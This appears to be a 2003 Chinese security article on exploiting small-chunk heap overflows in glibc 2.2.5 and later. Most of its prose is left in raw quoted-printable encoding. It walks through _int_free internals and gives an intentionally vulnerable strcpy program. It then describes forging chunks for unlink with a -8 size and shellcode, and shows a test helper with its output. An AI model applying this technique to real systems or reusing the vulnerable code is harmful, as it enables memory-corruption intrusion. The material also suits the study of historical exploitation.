|
| |
![](3D"http://www.nsfocus.net/images/doc_title.gif"=20) |
|
|
=D2=BB=D6=D6=D0=A1=B6=D1(heap)=D2=E7=B3=F6=B5=C4=C1=ED=C0=
=E0=C0=FB=D3=C3=B7=BD=B7=A8
=B7=A2=B2=BC=C8=D5=C6=DA=A3=BA=
2003-09-02
=CE=C4=D5=AA=C4=DA=C8=DD=A3=BA
=CE=C4=D5=AA=B3=F6=B4=A6=A3=BAhttp://www.cnhonker.com/index.php?module=3Darticles&a=
ct=3Dview&type=3D6&id=3D76
=CC=E1=BD=BB=CE=C4=D5=C2=A3=
=BA=20
bkbll
=CC=E1=BD=BB=C8=D5=C6=DA=A3=BA 2003-09-01 =
=CE=C4=D5=C2=CA=F4=D0=D4=A3=BA =
=D4=AD=B4=B4
=CE=C4=B5=B5=C0=E0=B1=F0=A3=BA =
=B1=E0=B3=CC=BC=BC=CA=F5=20
=E4=AF=C0=C0=B4=CE=CA=FD=A3=BA=20
=
=BD=F116=B4=CE/=D7=DC99=B4=CE
=D2=BB=D6=D6=D0=A1=B6=D1=
(heap)=D2=E7=B3=F6=B5=C4=C1=ED=C0=E0=C0=FB=D3=C3=B7=BD=B7=A8
bkbll(bkb=
ll@cnhonker.net)
2003-9-1
[1].=20
=
=CA=B2=C3=B4=CA=C7=B6=D1=D2=E7=B3=F6
=B6=D1=D2=
=E7=B3=F6(heap overflow) =C0=E0=CB=C6stack=20
overflow, =B7=A2=C9=FA=D4=DABSS=C7=F8. =B9=D8=D3=DAheap =
overflow=B5=C4=CE=C4=D5=C2=CD=E2=C3=E6=D3=D0=BA=DC=B6=E0, =
=C8=EB=C3=C5=BC=B6=B1=F0=B5=C4w00w00=B5=C4<w00w00=20
on Heap Overflows>, =
=D5=E2=C6=AA=CE=C4=D5=C2=B5=C4=D6=D0=CE=C4=B0=E6=CA=C7=D3=C9warning3 =
=D7=AB=D0=B4, =CE=C4=D5=C2=B5=D8=D6=B7=CA=C7: http://www.w00w00.org/files/articles/heaptut-chinese.txt<=
/A>,=20
=D3=A2=CE=C4=D4=AD=B0=E6=CA=C7: http://www.w00w00.org/files/articles/heaptut.txt,=20
=C6=E4=D6=D0=BB=B9=D3=D0warning3=D0=B4=B5=C4: =
<=D2=BB=D6=D6=D0=C2=B5=C4heap=C7=F8=D2=E7=B3=F6=BC=BC=CA=F5=B7=D6=CE=F6=
>, =CE=C4=D5=C2=D4=DA:
http://www.nsfocus.net/index.php?act=3Dsec_self&;do=3D=
view&doc_id=3D529&keyword=3Dheap
=B1=BE=C6=AA=BC=D9=C9=E8=C4=
=E3=C0=ED=BD=E2=C1=CB=D5=E2=C1=BD=C6=AA=CE=C4=D5=C2=B5=C4=D2=E2=D2=E5.[2].=20
=
=B1=BE=C6=AA=D2=C0=C0=B5=B5=C4=CF=B5=CD=B3
=B1=BE=C6=AA=CB=F9=D3=D0=B3=
=CC=D0=F2=B6=BC=D4=DARh linux 8.0 default install =
=C6=BD=CC=A8=C9=CF=B5=F7=CA=D4=CD=A8=B9=FD. =
=B9=D8=D3=DA=D0=A1=B6=D1=B5=C4=C0=FB=D3=C3,=20
=
=D4=DAglibc>=3D2.2.5=B5=C4=B0=E6=B1=BE=C9=CF=B2=C5=D3=D0=D2=E2=D2=E5, =
=D4=DAglibc 2.2.4(rh 7.2)=C9=CF, =
=C0=FB=D3=C3warning3=B5=C4=B7=BD=B7=A8=BE=CD=CD=EA=C8=AB=BF=C9=D0=D0,=20
=
=CB=F9=D2=D4=B1=BE=CE=C4=BC=D9=C9=E8=C4=E3=CA=B9=D3=C3=B5=C4=C6=BD=CC=A8g=
libc>=3D2.2.5. rh linux =
8.0=C9=CF=B5=C4=B0=E6=B1=BE=CA=C7glibc-2.2.93-5=20
.
[3].=20
=
=BA=CDglibc<=3D2.2.5=B5=C4=C7=F8=B1=F0
=CE=D2=
=C3=C7=BF=C9=D2=D4=BF=B4=BF=B4malloc=B5=C4=D4=B4=B4=FA=C2=EB.=20
=
=B5=CD=B0=E6=B1=BE=B5=C4=B7=D6=CE=F6=BF=C9=D2=D4=B2=CE=BF=B4warning3=B5=C4=
=CE=C4=D5=C2, =
=B8=DF=B0=E6=B1=BE=B5=C4=D4=B4=B4=FA=C2=EB=B7=D6=CE=F6=C8=E7=CF=C2(int_fr=
ee=BA=AF=CA=FD,=D2=F2=CE=AA=BA=AF=CA=FD=B1=C8=BD=CF=B3=A4,=20
=B7=D6=BD=E2=D2=BB=CF=C2):
void _int_free(mstate av, =
Void_t* mem)
{
if (mem !=3D=20
0) { //=C8=E7=B9=FBmem!=3DNULL
p =3D =
mem2chunk(mem);
size =3D=20
chunksize(p);
check_inuse_chunk(av, p);
if ((unsigned =
long)(size) <=3D (unsigned long)(av->max_fast)=20
=
//=D5=E2=C0=EF,=C8=E7=B9=FB=CA=C7=D0=A1=B6=D1<64bytes
#if =
TRIM_FASTBINS
&&=20
(chunk_at_offset(p, size) !=3D av->top)=20
=
//=B2=A2=C7=D2=D5=E2=B8=F6=BF=E9=B5=C4=CF=C2=D2=BB=BF=E9=B2=BB=CA=C7top=BF=
=E9
#endif
) {
set_fastchunks(av);
fb =3D=20
&(av->fastbins[fastbin_index(size)]);
p->fd =3D =
*fb;
*fb =3D p;
}
else if (!chunk_is_mmapped(p))=20
=
//=C8=E7=B9=FB=D5=E2=B8=F6=BF=E9=C3=BB=D3=D0mmap=CE=BB
{
nextchunk =
=3D chunk_at_offset(p,=20
size);
nextsize =3D =
chunksize(nextchunk);
assert(nextsize >=20
0);
/* consolidate backward */
if (!prev_inuse(p))=20
=
//=C8=E7=B9=FB=B5=B1=C7=B0=BF=E9=B5=C4size=B2=BF=B7=D6=B1=EA=D6=BE=D7=C5=C7=
=B0=D2=BB=BF=E9=CE=B4=CA=B9=D3=C3
{
prevsize =3D =
p->prev_size;
size=20
+=3D prevsize;
p =3D chunk_at_offset(p, -((long) =
prevsize));=20
unlink(p, bck, fwd); =
//=BA=CD=C7=B0=D2=BB=BF=E9=BA=CF=B2=A2
}
if (nextchunk !=3D=20
av->top)
{
/* get and =
clear inuse=20
bit */
nextinuse =3D=20
inuse_bit_at_offset(nextchunk,=20
nextsize);
//#define=20
clear_inuse_bit_at_offset(p, s) (((mchunkptr)(((char*)(p)) + =
(s)))->size &=3D =
~(PREV_INUSE))
/*=20
consolidate forward */
if =
(!nextinuse)=20
=
//=C8=E7=B9=FB=CF=C2=D2=BB=B8=F6=BF=E9=C3=BB=D3=D0=CA=B9=D3=C3, =
=D4=F2=BA=CF=B2=A2=D5=E2=B8=F6=BF=E9
=20
{
unlink(nextchunk, bck,=20
fwd);
size +=3D=20
nextsize;
}=20
=
=A1=AD=A1=AD=A1=AD=A1=AD
}
else=20
=
//=C8=E7=B9=FB=D5=E2=B8=F6=BF=E9=BA=F3=C3=E6=BD=F4=B0=A4=D7=C5top=BF=E9{
=A1=AD=A1=AD=A1=AD
}
/* =D7=A2=D2=E2=D5=E2=C0=EF, =
=C8=E7=B9=FB=BA=CF=B2=A2=BA=F3=B5=C4=B4=F3=D0=A1>0xffff=B5=C4=BB=B0)=20
*/
if ((unsigned long)(size) >=3D=20
FASTBIN_CONSOLIDATION_THRESHOLD)
{
if=20
=
(have_fastchunks(av))
malloc_consolidate(av);
=A1=AD=A1=AD.
}}
else=20
{=20
=
//=C8=E7=B9=FB=CA=C7mmap=B5=C4
=A1=AD=A1=AD=A1=AD=A1=AD.
&nbs=
p; }
}
}
=D7=DC=BD=E1=D2=BB=CF=C2,=20
=
=B2=BB=CD=AC=B5=C4=B5=D8=B7=BD=D3=D0:
1. =B5=B1=
free=B5=C4=B6=D1=B4=F3=D0=A1<64=D7=D6=BD=DA=B5=C4=CA=B1=BA=F2,=20
=
=BB=E1=C0=FB=D3=C3=D2=BB=D6=D6=BF=EC=CB=D9=B4=A6=C0=ED=B7=BD=B7=A8=C0=B4=B4=
=A6=C0=ED. =
2. =B5=B1=BA=CF=B2=A2=BA=F3=B5=C4size =
=B4=F3=D3=DA0xffff=B5=C4=CA=B1=BA=F2,=20
=BB=B9=D3=D0=C1=ED=CD=E2=D2=BB=B8=F6=B9=FD=B3=CC , =
=D5=E2=B8=F6=B9=FD=B3=CC=C8=E7=B9=FB=C4=E3=D3=C3=CE=B1=D4=EC=B5=C4chunk=C8=
=A5=B4=A6=C0=ED=B5=C4=BB=B0, =BA=DC=C4=D1=B1=A3=D6=A4=B2=BB=B3=F6=B4=ED, =
=
=CB=F9=D2=D4=BA=CF=B2=A2=BA=F3=B5=C4size=D2=AA=D0=A1=D3=DA0xffff.
3.&n=
bsp; =BF=E9=B5=C4=B4=F3=D0=A1=B1=D8=D0=EB=D2=AA=CA=C78=B5=
=C4=B1=B6=CA=FD.
1=BA=CD2=20
=B5=C4=B1=C8=BD=CF=B9=FD=B3=CC=B6=BC=CA=C7=D3=C3(unsigned =
long)=C0=E0=D0=CD=B1=C8=BD=CF, =CB=F9=D2=D4=D4=DA=D5=E2=C0=EF, =
=B8=BA=CA=FD=BF=C9=D2=D4=CC=D3=B1=DC1=B5=C4=B9=E6=D4=F2=CF=DE=D6=C6, =
=B6=F82=C0=EF=C3=E6=BE=CD=B2=BB=D0=D0=C1=CB,=20
=C8=E7=B9=FBsize=CA=C7=D2=BB=B8=F6=B8=BA=CA=FD, =
=BB=E1=C5=D0=B6=CF=CA=A7=B0=DC, =
=D5=E2=D1=F9=BB=E1=CC=F8=D7=AA=B5=BD=D2=BB=B8=F6=B8=B4=D4=D3=B5=C4=BC=C6=CB=
=E3=B9=FD=B3=CC, =
=CB=F9=D2=D4=D4=DA=D5=E2=C0=EFsize=D2=BB=B6=A8=B2=BB=C4=DC=CA=C7=B8=BA=CA=
=FD.
[4].=20
=D2=BB=B8=F6=D3=D0=C2=A9=B6=B4=B5=C4=B3=CC=D0=F2:
/* just =
for fun */
#include=20
<stdio.h>
#include <stdlib.h>
#include=20
<unistd.h>
main(int argc,char=20
**argv)
{
char=20
*p1;
char=20
=
*p2;
if(argc<2)=
=20
=
{
&nbs=
p; printf("Usage:%s=20
=
<string>\n",argv[0]);
=
exit(0);
}
&n=
bsp; if(strlen(argv[1])>40-1)
&n=
bsp;{
printf("ERROR:to=
o=20
=
long\n");
exit(0);
=
}
p1=3D(char=20
*)malloc(20);
p2=3D(char=20
=
*)malloc(40);
memset(p1,0,20);
=
memset(p2,0,40);
strcpy(p2,argv[1]=
);
strcpy(p1,p2);
p=
rintf("[+]=20
=
input:%s\n",p1);
memset(p2,0,40);
&nb=
sp; free(p1);
free(p2);
&n=
bsp; exit(0);
}
[5].=20
=
=C0=FB=D3=C3=B7=BD=B7=A8=CB=BC=BF=BC
=B3=F5=BF=
=B4=C6=F0=C0=B4=BA=CD=D2=D4=C7=B0=B5=C4heap =
overflow=C0=FB=D3=C3=B7=BD=B7=A8=D2=BB=D1=F9,=20
=
=CE=B1=D4=ECchunk2=BA=CDchunk3=BE=CD=BF=C9=D2=D4=D0=B4=B3=F6exp=B5=C4, =
=B5=AB=D2=F2=CE=AA=B5=DA=D2=BB=B8=F6=BF=E9=CA=C7=D0=A1=BF=E9,=20
=
=CB=F9=D2=D4=C0=FB=D3=C3=B7=BD=B7=A8=D3=D6=D3=D0=CB=F9=B2=BB=D2=BB=D1=F9.=
=B4=D3=C4=DA=B4=E6=BD=E1=B9=B9=C0=B4=BF=B4, =
=CE=D2=C3=C7=BF=C9=D2=D4=B8=B2=B8=C7=B5=C4=D3=D0:=20
p2=B5=C4prev_size=BA=CDp2=B5=C4size=C1=BD=B8=F6=B5=D8=B7=BD. =
=C7=A1=BA=C3=D5=E2=C1=BD=B8=F6=B5=D8=B7=BD=CA=C7=BF=D8=D6=C6p2=B5=C4=C7=B0=
=D2=BB=B8=F6=BF=E9=BA=CD=BA=F3=D2=BB=B8=F6=BF=E9=B5=C4=B9=D8=BC=FC=CA=FD=BE=
=DD,=20
=
=CB=F9=D2=D4=BB=F9=B1=BE=C9=CF=CE=D2=C3=C7=BF=C9=D2=D4=CE=B1=D4=EC=B3=F6=C7=
=B0=D2=BB=B8=F6=BF=E9=BA=CD=BA=F3=D2=BB=B8=F6=BF=E9, =
=D6=BB=D2=AA=BF=D8=D6=C6=BA=C3inuse=CE=BB,=20
=
=CE=D2=C3=C7=BE=CD=BF=C9=D2=D4=C0=FB=D3=C3unlik=B2=D9=D7=F7=D0=B4=C8=CE=D2=
=E2=CB=C4=B8=F6=D7=D6=BD=DA=B5=C4=CA=FD=BE=DD=B5=BD=C8=CE=D2=E2=B5=D8=B7=BD=
.
=D5=E2=C0=EF=D0=E8=D2=AA=D7=A2=D2=E2=B5=C4=CA=
=C7size=B1=D8=D0=EB=D2=AA=CA=C7=D2=BB=B8=F6=D5=FD=CA=FD,=20
=
=B6=F8=C7=D2=D5=E2=B8=F6=CA=FD=D6=B5=B1=D8=D0=EB=D0=A1=D3=EB0xffff. =
=D5=E2=C0=EF=CE=D2=C3=C7=D3=D0=C1=BD=D6=D6=D1=A1=D4=F1(=CE=AA=C1=CB=C3=E8=
=CA=F6=B7=BD=B1=E3, =
=CE=D2=C3=C7=B0=D1p2=C7=B0=D2=BB=B8=F6=BF=E9=B3=C6=D7=F6p1,=BA=F3=C3=E6=B5=
=C4=D2=BB=B8=F6=BF=E9=B3=C6=D7=F6p3,=20
=
p3=B5=C4=CF=C2=D2=BB=BF=E9=B3=C6=D7=F7p4)
1. =C0=
=FB=D3=C3=CE=B1=D4=EC=B5=C4p1,=BD=F8=D0=D0unlink=B2=D9=D7=F7.=20
=
=D6=BB=D0=E8=D2=AA=C8=C3p2=B5=C4prev_inuse=CE=BB=C7=E5=C1=E3
2. &=
nbsp; =C0=FB=D3=C3=CE=B1=D4=ECp3=BD=F8=D0=D0unlink=B2=D9=D7=F7=
,=20
=
=D2=F2=CE=AA=BA=F3=C3=E6=D3=D0=C5=D0=B6=CFp3=CA=C7=B7=F1=CA=B9=D3=C3, =
=CB=F9=D2=D4=BB=B9=D0=E8=D2=AA=CE=B1=D4=ECp4.
=C8=E7=B9=FB=CA=C7=D2=AA=
=C0=FB=D3=C3=CE=B1=D4=ECp3=BD=F8=D0=D0unlink=B2=D9=D7=F7=B5=C4=BB=B0,=20
=D2=F2=CE=AA=D2=AA=BF=BC=C2=C7=B5=BDsize>0,=20
=
=D5=E2=C0=EF=D2=AA=BF=BC=C2=C7=C1=BD=D6=D6=C7=E9=BF=F6(=C0=FB=D3=C3strcpy=
,=CB=F9=D2=D4=CA=FD=BE=DD=C0=EF=C3=E6=B2=BB=C4=DC=D3=D00x00):
1. =
p2=B5=C4size>0=20
=D2=F2=CE=AAp2=B1=BE=C9=ED=D4=B5=B9=CA, =
=D5=E2=B8=F6=C0=EF=C3=E6=BF=C9=D2=D4=BA=AC=D3=D00x00. =
=D5=E2=D1=F9p3=BE=CD=D6=BB=C4=DC=D4=DAp2=BA=F3=C3=E6=C1=CB, =
=B5=AB=BF=B4=B3=CC=D0=F2=C0=EF=C3=E6,p2=BA=F3=C3=E6=B5=C4=CA=FD=BE=DD=BB=F9=
=B1=BE=C9=CF=C8=AB=CE=AA0 ,=20
=
p3=B5=C4fd=BA=CDbk=CA=FD=BE=DD=CE=DE=B7=A8=CC=EE=B3=E4.=CB=F9=D2=D4=B2=BB=
=B4=F3=BF=C9=C4=DC.
2. p2=B5=C4size<0=20
=
=D5=E2=D1=F9=D2=AA=C7=F3p3=B5=C4size>0=B6=F8=C7=D20xffff>(p3->si=
ze+p2->size)>0.=20
=
=B2=A2=C7=D2=CD=A8=B9=FDp3->size=CE=B1=D4=EC=B5=C4p4=D2=AA=C2=FA=D7=E3=
=CE=D2=C3=C7=B5=C4=D2=AA=C7=F3,=20
=
=D7=EE=D6=D8=D2=AA=B5=C4=CA=C7p3->size=CB=C4=B8=F6=D7=D6=BD=DA=B5=C4=C4=
=DA=B4=E6=BF=E9=C0=EF=C3=E6=B2=BB=C4=DC=D3=D00x00.=BA=C3=CF=F1=D4=DA=C4=DA=
=B4=E6=D6=D0=BB=B9=D5=D2=B2=BB=B3=F6=D5=E2=D1=F9=B5=C4=D2=BB=B8=F6=CE=BB=D6=
=C3=C0=B4=B7=C5=CE=D2=C3=C7=B5=C4p3,=C8=E7=B9=FB=C4=E3=D3=D0=B8=FC=BA=CF=CA=
=CA=B5=C4=B0=EC=B7=A8,=20
=
=C7=EB=BA=CD=BD=BB=C1=F7.
=B4=D3=C9=CF=C3=E6=B5=C4=B7=D6=CE=F6=BF=C9=D2=
=D4=BF=B4=B3=F6, =
=C0=FB=D3=C3=CE=B1=D4=EC=B5=C4p3=BF=E9=BD=F8=D0=D0unlink=B2=D9=D7=F7=C4=D1=
=B6=C8=CF=B5=CA=FD=CC=AB=B4=F3=C1=CB.=20
=
=CE=D2=C3=C7=BF=B4=BF=B4=C0=FB=D3=C3=CE=B1=D4=EC=B5=C4p1=BF=C9=B2=BB=BF=C9=
=D0=D0.
=D2=F2=CE=AAp1=B5=C4=B5=D8=D6=B7=CA=C7=D5=E2=D1=F9=BC=C6=CB=E3=
=B5=C4:p1 addr=3Dp2 addr =A8C=20
p2->prev_size, =
=B6=F8p2=BA=F3=C3=E6=B5=C4=C4=DA=B4=E6=BB=F9=B1=BE=C9=CF=C8=AB=CE=AA0 =
,=CB=F9=D2=D4=D5=E2=C0=EF=B5=C4prev_size=B1=D8=D0=EB=D2=AA=CE=AA=D2=BB=B8=
=F6=D5=FD=CA=FD,=20
=
=B5=AB=CA=C7=D3=D6=D2=F2=CE=AA=CE=D2=C3=C7=D2=AA=B8=B2=B8=C7=B5=BDp2=B5=C4=
size,=CB=F9=D2=D4prev_size=C4=DA=B4=E6=BF=E9=B2=BB=C4=DC=D3=D00x00=CA=FD=BE=
=DD,=20
=
=D5=E2=C0=EF=B5=C4p2->prev_size=BE=CD=D6=BB=C4=DC=CA=C7=D2=BB=B8=F6=B7=
=C7=B3=A3=B4=F3=B5=C4=D5=FD=CA=FD. =
=B3=F5=BF=B4=C9=CF=C8=A5=CA=C7=B2=BB=BF=C9=D0=D0=B5=C4, =
=B5=AB=C1=AA=CF=EB=B5=BD=CE=D2=C3=C7=B5=C4=B6=D1=D5=BB=CA=FD=BE=DD=CA=C70=
xbffff=BF=AA=CD=B7=B5=C4,=20
=
=C8=E7=B9=FB=BD=AB=D5=E2=B8=F6=B5=D8=D6=B7=BF=B4=B3=C9=CA=C7=D2=BB=B8=F6=D3=
=D0=B7=FB=BA=C5=B5=C4=CA=FD=BB=B0,=C7=A1=BA=C3=CA=C7=D2=BB=B8=F6=B8=BA=CA=
=FD, =
=B4=D3=C7=B0=C3=E6=B5=C4=D4=B4=B4=FA=C2=EB=C9=CF=B7=D6=CE=F6=BF=C9=D2=D4=BF=
=B4=B3=F6,size=B5=C4=BC=D3=B7=A8=C8=AB=CA=C7=D3=D0=B7=FB=BA=C5=B5=C4=B2=D9=
=D7=F7,=20
=
=CB=F9=D2=D4=CE=D2=C3=C7=BF=C9=B2=BB=BF=C9=D2=D4=BD=ABp1=BD=E1=B9=B9=B7=C5=
=B5=BD=CE=D2=C3=C7=B5=C4=B6=D1=D5=BB=C0=EF=C3=E6=C4=D8? =
=D5=E2=D1=F9=CE=D2=C3=C7=BF=C9=D2=D4=CD=A8=B9=FD=D5=E2=B8=F6=B7=C7=B3=A3=B4=
=F3=B5=C4=D5=FD=CA=FD=BD=ABP1=B7=C5=B5=BD=B6=D1=D5=BB=C0=EF=C3=E6. =
P1=C8=B7=B6=A8=BA=C3=C1=CB,=20
=
=CE=AA=C1=CB=B1=A3=D6=A40xffff>(p2->size+p1->size)>0, =
=B6=F8=C7=D2=D3=D6=D2=AA=C7=F3=CE=D2=C3=C7=BF=C9=D2=D4=BF=D8=D6=C6p3,=20
=
=CE=D2=C3=C7=D3=D6=D0=E8=D2=AA=BE=AB=D0=C4=B9=B9=D4=EC=D2=BB=B8=F6p2->=
size,=B6=F8=C7=D2=D5=E2=B8=F6=CA=FD=BE=DD=BB=B9=D0=E8=D2=AA=C9=E8=D6=C3p1=
=B5=C4non-use=CE=BB. =
=BF=B4=C9=CF=C8=A5=CA=C7=B2=BB=CA=C7=B2=BB=BF=C9=C4=DC=B5=C4?=20
=
=C8=C3=CE=D2=C3=C7=BF=B4=D2=BB=BF=B4=D2=BB=B8=F6=BE=AB=B2=CA=B5=C4=CA=FD=D1=
=A7=B1=E4=BB=BB.
=BC=D9=C9=E8=CE=D2=C3=C7p2=B5=D8=D6=B7=CA=C7p2addr,p1=
=B5=D8=D6=B7=CA=C7p1addr,p1=B5=C4=B4=F3=D0=A1=CA=C7p1size,p2=B5=C4=B4=F3=D0=
=A1=CA=C7p2size,p3=B5=C4=B5=D8=D6=B7=CA=C7p3addr,=20
=
p1size+p2size=3Doffset,=D5=E2=B8=F6offset=B7=FB=BA=CF=B4=F3=D3=DA0=BA=CD=D0=
=A1=D3=DA0xffff=B5=C4=B9=E6=B6=A8.=20
=
=C4=C7=C3=B4=D5=E2=C0=EF=D3=D0=BC=B8=B8=F6=B5=C8=CA=BD:
p2=
addr-p1size=3Dp1addr ------------=A2=D9
p2addr+=
p2size=3Dp3addr ------------=A2=DA
p1size+p2siz=
e=3Doffset ------------=A2=DB
=A2=DA-=A2=
=D9=B5=C3:
p2size+p1size=3Dp3addr-p1addr
=B4=FA=C8=EB=A2=DB=B5=C3:<=
BR>offset=3Dp3addr-p1addr,=D2=B2=BC=B4:
p3addr=3Dp1addr+offset.
=CE=
=D2=C3=C7=B5=C4p1=B7=C5=D4=DA=B6=D1=D5=BB,=20
=
=D6=BB=D2=AA=CE=D2=C3=C7=BC=D3=C9=CF=D2=BB=B5=E3=B5=E3=B5=C4offset=BE=CD=BF=
=C9=D2=D4=B5=C3=B5=BD=CE=D2=C3=C7=B5=C4p3, =
=C4=C7=C3=B4p4=D2=B2=BF=C9=D2=D4=CB=B3=C0=FB=CE=B1=D4=EC=B3=F6=C0=B4=C1=CB=
. =
=CF=D6=D4=DA=B0=DA=D4=DA=C3=E6=C7=B0=B5=C4=CE=CA=CC=E2=BE=CD=D6=BB=D3=
=D0=D2=BB=B8=F6:=20
=
p3addr-p2addr=D2=B2=BE=CD=CA=C7p2size=B1=D8=D0=EB=D2=AA=C9=E8=D6=C3non-ma=
p=BA=CDnon-use=CE=BB. =B6=F8=C7=D2p2size=D2=AA=CE=AA8=B5=C4=B1=B6=CA=FD, =
=D5=E2=D1=F9=BF=B4=C0=B4,=20
=
p2size=D7=EE=BA=F3=D2=BB=B8=F6=CA=FD=BE=DD=B1=D8=D0=EB=CE=AA8. =
=D5=E2=B8=F6=CA=B1=BA=F2=D3=D6=D3=D0=D2=BB=B8=F6=CE=CA=CC=E2=B3=F6=C0=
=B4=C1=CB,=20
=
=CE=D2=C3=C7=B8=C3=D4=F5=C3=B4=B9=B9=D4=EC=D5=E2=D0=A9=CA=FD=BE=DD=D2=D4=C8=
=B7=B1=A3p3=B5=C4=BD=E1=B9=B9=C0=EF=C3=E6=B7=FB=BA=CF=D2=AA=C7=F3=B6=F8p3=
=B5=C4=B5=D8=D6=B7=BA=CDp2=B5=D8=D6=B7=D6=AE=B2=EE=D7=EE=BA=F3=D2=BB=CE=BB=
=D2=AA=CE=AA8?=20
=
=D5=E2=B8=F6=CA=FD=BE=DD=B8=C3=C8=E7=BA=CE=B1=BB=C8=B7=B1=A3=B4=E6=D4=DA?=
=BE=AD=B9=FD=CB=BC=BF=BC, =
=CE=D2=C3=C7=BF=C9=D2=D4=CF=EB=CF=F1=B3=F6=CE=D2=C3=C7=B5=C4p1=BA=CDp3=CA=
=FD=BE=DD=CA=C7=D5=E2=D1=F9=B5=C4:
|AAAA|AAAA|=20
FD | BK |AAA.AAAAA|AAAA|=20
=
P3SIZE|=A1=AD.
p1 =
; =
=20
=
p3
=D2=F2=CE=AA=CE=D2=C3=C7=B2=BB=D3=C3=B9=D8=D0=C4p1=B5=C4pre=
v_size=D2=D4=BC=B0p1=B5=C4size,=20
=
=B6=F8=CE=D2=C3=C7=D6=BB=D0=E8=D2=AA=B9=D8=D0=C4p4=B5=C4size=B5=C4inuse=CA=
=C7=B7=F1=CE=AA0, =
=D5=E2=D1=F9,=CE=D2=C3=C7=BD=ABp3->size=C9=E8=D6=C3=B3=C90xfffffff8(-8=
),=20
=D5=E2=D1=F9p4=3Dp3+p3->size=3Dp3-8, =
=D5=E2=D1=F9=D6=BB=D2=AA=B1=A3=D6=A4*(char =
*)(p3-1)=B5=C4=CA=FD=BE=DD=D7=EE=BA=F3=D2=BB=CE=BB=CE=AA1=BE=CD=BF=C9=D2=D4=
=C1=CB.=20
=
=CC=EE=B3=E4=B5=C4A=BE=CD=BF=C9=D2=D4=C2=FA=D7=E3=D2=AA=C7=F3.=20
=
=D4=DAP1=BA=CDP3=B5=C4=CA=FD=BE=DD=BA=F3=C3=E6=CE=D2=C3=C7=BF=C9=D2=D4=B8=
=FA=C9=CF=CE=D2=C3=C7=B5=C4shellcode,=D5=E2=D1=F9=B9=B9=D4=EC=BA=F3=B5=C4=
=CA=FD=BE=DD=D3=A6=B8=C3=CA=C7=D5=E2=D1=F9=B5=C4:
| =
=B1=BB=CC=E6=BB=BB=B5=C4=B5=D8=D6=B7=20
| =CC=E6=BB=BB=B5=C4=B5=D8=D6=B7 | =
xxxxxxxxxxxA|AAAA| -8 | shellcode=20
=
|
p1+8 p1+12 =
; =
=20
=
p3
=CE=D2=C3=C7=BB=D8=B5=BD=B8=D5=B2=C5=B5=C4=CE=CA=CC=E2, =
=D4=F5=C3=B4=B1=A3=D6=A4p3=B5=C4=B5=D8=D6=B7=C2=FA=D7=E3=D2=AA=C7=F3. =
=CE=D2=C3=C7=BF=C9=D2=D4=D5=E2=D1=F9=BF=BC=C2=C7,=20
=C4=DA=B4=E6=D6=D0=B4=E6=B7=C5=B6=E0=B4=CE=B5=C4xxxA|AAAA| =
-8 | =D5=E2=D1=F9=B5=C4=BD=E1=B9=B9, =
=C6=E4=D6=D0XXXA|AAAA=B3=A4=B6=C8=CE=D2=C3=C7=D0=E8=D2=AA=D1=E9=CB=E3=D2=BB=
=CF=C2. =CE=D2=C3=C7=B5=C4=C4=BF=B1=EA=CA=C7,=20
=
=BE=AD=B9=FD=D3=D0=CF=DE=B4=CE=B5=C416=CE=BB=CA=FD=BE=DD=D1=AD=BB=B7, =
=CE=D2=C3=C7=D7=DC=BF=C9=D2=D4=D5=D2=B5=BD=B7=FB=BA=CF=D2=AA=C7=F3=B5=C4x=
xxxA|AAAA|-8|=D5=E2=D1=F9=C2=FA=D7=E3=D2=AA=C7=F3=B5=C4=BD=E1=B9=B9.=20
=
=CE=D2=C3=C7=D0=B4=B8=F6=D0=A1=B3=CC=D0=F2=D1=E9=CB=E3=D2=BB=CF=C2:
[n=
etconf@linux1 challenge]$ cat=20
test1.c
/* test for 32 bits value */
#include=20
<stdio.h>
#include <stdlib.h>
#include=20
<unistd.h>
#define SIZE 200
#define PAD =
5
#define=20
FG 'A'
#define ADDR 0xfffffff8
void foo(int =
offset,char=20
*buffer)
{
int=20
i,found=3D0;
=20
=
for(i=3Doffset;i<strlen(buffer);i+=3D16)
&n=
bsp; =20
=
{
&n=
bsp; =20
if((buffer[i]=3D=3DFG) && (buffer[i+1]=3D=3DFG) =
&&=20
(buffer[i+2]=3D=3DFG) && (buffer[i+3]=3D=3DFG) =
&&=20
(*(unsigned int=20
=
*)(buffer+i+4)=3D=3DADDR))
&=
nbsp; =20
=
{
&n=
bsp; =20
printf("[+] found.i:%3d,cont:%c%c%c%c=20
=
ADDR:%p\n",i,buffer[i],buffer[i+1],buffer[i+2],buffer[i+3],*(unsigned=20
int=20
=
*)(buffer+i+4));
=
; =
=20
=
found=3D1;
=
; =
=20
=
continue;
=
=20
}
=20
}
=20
if(found=3D=3D0) printf("[-] not=20
found\n");
}
main(int argc,char=20
**argv)
{
char=20
buffer[SIZE];
int=20
i,j;
int=20
pd=3DPAD;
=
if(argc>1)=20
pd=3Datoi(argv[1]);
=20
=
memset(buffer,0,SIZE);
=20
=
for(i=3D0;i<SIZE-1;i+=3Dpd+4)
=
=
{
&n=
bsp; =20
=
memset(buffer+i,FG,pd);
&nbs=
p; =20
*(unsigned int=20
=
*)(buffer+i+pd)=3DADDR;
=20
}
printf("[+]=20
PAD=3D%d\n\n",pd);
=20
=
for(j=3D0;j<pd;j++)
=20
=
{
&n=
bsp; =20
printf("[+]=20
=
Offset:%d\n",j);
=
; =20
foo(j,buffer);
=20
}
}
[netconf@linux1=20
=
challenge]$
=CE=D2=C3=C7=B7=D6=B1=F0=D1=E9=CB=E3=D2=BB=CF=C2=B4=D31-9=B7=
=FB=BA=CF=D2=AA=C7=F3=B5=C4PAD=CA=C7=B6=E0=C9=D9:
[netconf@lin=
ux1=20
challenge]$ gcc -o test1 test1.c
[netconf@linux1 =
challenge]$=20
./test1 1
[+] PAD=3D1
[+] Offset:0
[-] not=20
found
[netconf@linux1 challenge]$ ./test1 2
[+]=20
PAD=3D2
[+] Offset:0
[-] not found
[+] =
Offset:1
[-]=20
not found
[netconf@linux1 challenge]$ ./test1 3
[+]=20
PAD=3D3
[+] Offset:0
[-] not found
[+] =
Offset:1
[-]=20
not found
[+] Offset:2
[-] not =
found
[netconf@linux1=20
challenge]$ ./test1 4
[+] PAD=3D4
[+] =
Offset:0
[+]=20
found.i: 0,cont:AAAA ADDR:0xfffffff8
[+] =
found.i:=20
16,cont:AAAA ADDR:0xfffffff8
[+] found.i: 32,cont:AAAA=20
ADDR:0xfffffff8
[+] found.i: 48,cont:AAAA =
ADDR:0xfffffff8
[+]=20
found.i: 64,cont:AAAA ADDR:0xfffffff8
[+] found.i: =
80,cont:AAAA=20
ADDR:0xfffffff8
